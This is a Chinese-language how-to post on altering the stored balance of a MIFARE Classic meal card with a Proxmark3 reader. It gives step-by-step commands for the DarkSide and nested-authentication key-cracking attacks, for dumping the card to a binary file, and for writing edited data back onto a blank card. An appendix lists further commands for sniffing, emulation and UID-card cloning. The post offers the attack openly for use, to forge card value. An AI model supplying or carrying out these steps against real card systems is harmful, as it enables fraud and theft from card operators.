對于無線射頻卡RFID小弟有所研究今日分享一篇關于修改飯卡金額的文章
如果對ID,IC卡還不是很了解先看看raidwar的文章把,驅動什么的請自行百度
以及命令幫助
使用Proxmark3進行MIFARE Classic卡的安全測試
以及數(shù)據(jù)分析
下面進入正題
首先
驅動裝好之后可以看到設備管理器中查看 發(fā)現(xiàn)proxmark3使用是COM5端口
proxmark3.exe COM5
hw tune
成功后如下顯示

此時講自己的高頻卡放上去然后直接使用命令
hf mf mifare
如果

找到 validkey 則直接使用命令:?
(必須知道一個正確的Key方可進行相關的操作)
hf mf nested 1 0 A ffffffffffff
基于驗證漏洞進行全卡區(qū)域Key破解?
如果結果為

則 ? 再次進行漏洞循環(huán)破解
hf mf mifare 524bb6a2?
直到找到正確密碼為止(顯示Found valid key)
找到密碼后使用(測試嵌套認證漏洞,基于一個已知Key,獲取都有扇區(qū)Keys)
hf mf nested 1 0 A ffffffffffff d
導出密碼二進制文件,接著使用
hf mf dump
dump數(shù)據(jù)到bin文件 后分析修改數(shù)據(jù)后再次導入
使用命令以二進制方式恢復數(shù)據(jù)到空白的MIFARE classic卡
hf mf restore
完成
附錄
hf mf (MIFARE卡的相關命令...)
help顯示幫助
dbg設置默認調試模式
rdbl讀取MIFARE classic卡的區(qū)塊數(shù)據(jù)
rdsc讀取MIFARE classic卡的扇區(qū)數(shù)據(jù)
dump導出MIFARE classic卡的數(shù)據(jù)到二進制文件
restore從二進制文件恢復數(shù)據(jù)到空白的MIFARE classic卡
wrbl改寫MIFARE classic卡的區(qū)塊數(shù)據(jù)
chk測試MIFARE classic卡的各個區(qū)塊KEY A/B
mifare基于PRNG漏洞,執(zhí)行mifare “DarkSide”攻擊操作
nested測試嵌套認證漏洞,基于一個已知Key,獲取都有扇區(qū)Keys
sniff嗅卡片與讀寫器之間的通訊(等同于hf 14a snoop)
sim模擬一個MIFARE卡片
eclr清除仿真內存的各區(qū)塊數(shù)據(jù)
eget獲取仿真內存的各區(qū)塊數(shù)據(jù)
eset設置仿真內存的各區(qū)塊數(shù)據(jù)
eload從導出的文件加載仿真數(shù)據(jù)
esave導出保存仿真數(shù)據(jù)到文件
ecfill利用仿真器的keys來填補仿真內存
ekeyprn打印輸出仿真內存中的keys
csetuid直接設置可改UID卡的UID
csetblk把對應區(qū)塊數(shù)據(jù)寫入UID卡
cgetblk讀取UID卡對應區(qū)塊數(shù)據(jù)
cgetsc讀取UID卡對應扇區(qū)數(shù)據(jù)
cload寫入dump數(shù)據(jù)到UID卡。注意
csave保存UID卡數(shù)據(jù)到文件或者仿真內存